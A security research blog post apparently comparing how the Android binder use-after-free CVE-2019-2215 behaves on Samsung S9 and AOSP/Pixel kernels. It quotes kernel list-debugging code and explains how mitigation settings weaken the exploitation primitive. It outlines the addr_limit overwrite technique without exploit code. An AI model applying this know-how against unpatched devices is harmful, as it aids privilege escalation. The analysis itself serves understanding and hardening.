When the initial technical advisory for CVE-2019-2215 came out last year, Samsung S9 was listed as a vulnerable device. The use-after-free is indeed present in the Samsung kernels on unpatched S9 devices and can be triggered using the original reproducer discovered by syzkaller/syzbot. However, the obtained exploitation primitive is different from the Pixel 2 device demonstrated in the original advisory. This post demonstrates the differences between AOSP/Pixel and S9 kernels.
If you're not familiar with the vulnerability details, refer to the P0 blog post for details. Specifically the vulnerable object struct thread_binder gets freed and then accessed (use-after-free) in remove_wait_queue(...). The full UAF path is ep_eventpoll_release → ep_free → ep_unregister_pollwait → ep_remove_wait_queue → remove_wait_queue.
void remove_wait_queue(wait_queue_head_t *q, wait_queue_t *wait)
...
spin_lock_irqsave(&q->lock, flags); [1]
__remove_wait_queue(q, wait); [2]
spin_unlock_irqrestore(&q->lock, flags); [3]
}
The first use-after-free access happens when locking the spinlock in [1]. For those not familiar with the Linux spinlocks implementation, the lock structure is shown below:
(gdb) ptype arch_spinlock_t
type = struct {
u16 owner;
u16 next;
}
If owner and next are equal, the lock can be acquired by the execution path. The previously described exploitation technique sets the lock value to 0 (unlocked state). If the refilled object at the lock offset (on Samsung kernels this offset is 0x68) within struct binder_thread is set to a value representing a locked spinlock state, the execution path above will enter a deadlock. However, the value of the spinlock can be any 32-bit integer as long as owner and next members are equal, e.g., 0x10001, 0x20002, etc. (indicating that it is unlocked).
In [3] the unlocking procedure simply increments both the ownerand next values by 1. For example, if the original lock value was 0 (before acquiring the lock), after [3] it becomes 0x10001. Code paths in [1] and [3] by themselves represent a very weak exploitation primitive.
What really makes this vulnerability exploitable is the code path in [2]. The UAF access on this path overwrites a couple of members of the freed struct binder_thread object with a "self-referencing" pointer when manipulating the linked list. __remove_wait_queue() simply performs the list_del operation on the task_list member the freed struct binder_thread:
static inline void
__remove_wait_queue(wait_queue_head_t *head, wait_queue_t *old)
{
list_del(&old->task_list);
}
The iovec refill is then used to leak the address of the task_struct of the current process and then overwrite its addr_limit to gain arbitrary kernel read/write.
If CONFIG_DEBUG_LIST kernel configuration option is enabled, this vulnerability should become unexploitable leading to a kernel panic as a result of additional linked list checks. To be specific, the list_del implementation in the 4.9 Samsung kernel (with CONFIG_DEBUG_LIST enabled by default) is shown below.
static inline void list_del(struct list_head *entry)
{
__list_del_entry(entry);
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}
void __list_del_entry(struct list_head *entry)
{
struct list_head *prev, *next;
prev = entry->prev;
next = entry->next;
if (WARN(next == LIST_POISON1,
"list_del corruption, %p->next is LIST_POISON1 (%p)\n",
entry, LIST_POISON1) ||
WARN(prev == LIST_POISON2,
"list_del corruption, %p->prev is LIST_POISON2 (%p)\n",
entry, LIST_POISON2) ||
WARN(prev->next != entry,
"list_del corruption. prev->next should be %p, "
"but was %p\n", entry, prev->next) ||
WARN(next->prev != entry,
"list_del corruption. next->prev should be %p, "
"but was %p\n", entry, next->prev)) {
list_bug(); [4]
return;
}
__list_del(prev, next); [5]
}
The UAF with a self-referencing pointer happens in [5]. However, as can be seen above, there are several list safety checks that lead to list_bug() in [4] if list corruption is detected. And we would expect list_bug() to trigger BUG() but here's what Samsung did instead:
static inline void list_bug(void)
{
#ifdef CONFIG_DEBUG_LIST_PANIC
BUG_ON(1);
#endif
}
CONFIG_DEBUG_LIST_PANIC is NOT enabled by default in S9 kernels. This leads to just a kernel warning followed by an immediate return after [4] (and not reaching [5]).
What we end up with is a much weaker exploitation primitive - locking and unlocking the wait queue spinlock in [1] and [2]. The previously described exploitation technique relied on __remove_wait_queue() triggering the UAF write with a self-referencing pointer. On S9 we can only increment a couple of bytes by 1.
AOSP kernels are slightly different. The list_delimplementation (when CONFIG_DEBUG_LIST is enabled) is shown below.
static inline void list_del(struct list_head *entry)
{
__list_del_entry(entry);
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}
static inline void __list_del_entry(struct list_head *entry)
{
if (!__list_del_entry_valid(entry)) [6]
return;
__list_del(entry->prev, entry->next);
}
__list_del_entry_valid in [6] uses the CHECK_DATA_CORRUPTION macro to validate list entries. If CONFIG_BUG_ON_DATA_CORRUPTION config option is enabled, BUG() is triggered resulting in kernel panic. Otherwise only a warning is produced similar to the Samsung kernels.
bool __list_del_entry_valid(struct list_head *entry)
{
struct list_head *prev, *next;
prev = entry->prev;
next = entry->next;
if (CHECK_DATA_CORRUPTION(next == LIST_POISON1,
"list_del corruption, %p->next is LIST_POISON1 (%p)\n",
entry, LIST_POISON1) ||
CHECK_DATA_CORRUPTION(prev == LIST_POISON2,
"list_del corruption, %p->prev is LIST_POISON2 (%p)\n",
entry, LIST_POISON2) ||
CHECK_DATA_CORRUPTION(prev->next != entry,
"list_del corruption. prev->next should be %p, but was %p\n",
entry, prev->next) ||
CHECK_DATA_CORRUPTION(next->prev != entry,
"list_del corruption. next->prev should be %p, but was %p\n",
entry, next->prev))
return false;
return true;
}
#define CHECK_DATA_CORRUPTION(condition, fmt, ...) \
check_data_corruption(({ \
bool corruption = unlikely(condition); \
if (corruption) { \
if (IS_ENABLED(CONFIG_BUG_ON_DATA_CORRUPTION)) { \
pr_err(fmt, ##__VA_ARGS__); \
BUG(); \
} else \
WARN(1, fmt, ##__VA_ARGS__); \
} \
corruption; \
}))
However, Pixel 3/XL devices (even though they're not affected by CVE-2019-2215) have neither CONFIG_DEBUG_LIST nor CONFIG_BUG_ON_DATA_CORRUPTION enabled by default making list/hlist corruption vulnerabilities more easily exploitable on Google devices.
Samsung S9 kernels have CONFIG_DEBUG_LIST enabled by default but CONFIG_DEBUG_LIST_PANIC is disabled. In theory this still leaves the device vulnerable to CVE-2019-2215 but results in much weaker exploitation primitive - incrementing a couple of bytes by 1 where the original value (being incremented) should represent an unlocked spinlock value.
The situation is similar on AOSP kernels where CONFIG_BUG_ON_DATA_CORRUPTION needs to be enabled in combination with CONFIG_DEBUG_LIST for the mitigation to be effective against vulnerabilities leading to linked list / hash table corruption.